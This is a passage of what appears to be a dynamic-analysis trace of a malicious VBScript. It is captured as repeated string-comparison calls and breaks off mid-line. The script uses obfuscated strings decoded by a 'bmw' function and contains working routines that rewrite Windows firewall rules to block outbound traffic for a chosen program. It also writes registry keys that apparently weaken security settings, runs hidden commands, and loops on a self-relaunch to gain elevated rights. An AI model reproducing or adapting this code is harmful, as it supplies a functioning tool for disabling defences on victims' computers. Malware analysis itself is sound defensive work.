(fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88 [0222.988] wcsncmp (_String1="t policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 103 [0222.988] wcsncmp (_String1=" policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0222.988] wcsncmp (_String1="policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 99 [0222.988] wcsncmp (_String1="olicy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 98 [0222.988] wcsncmp (_String1="licy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite 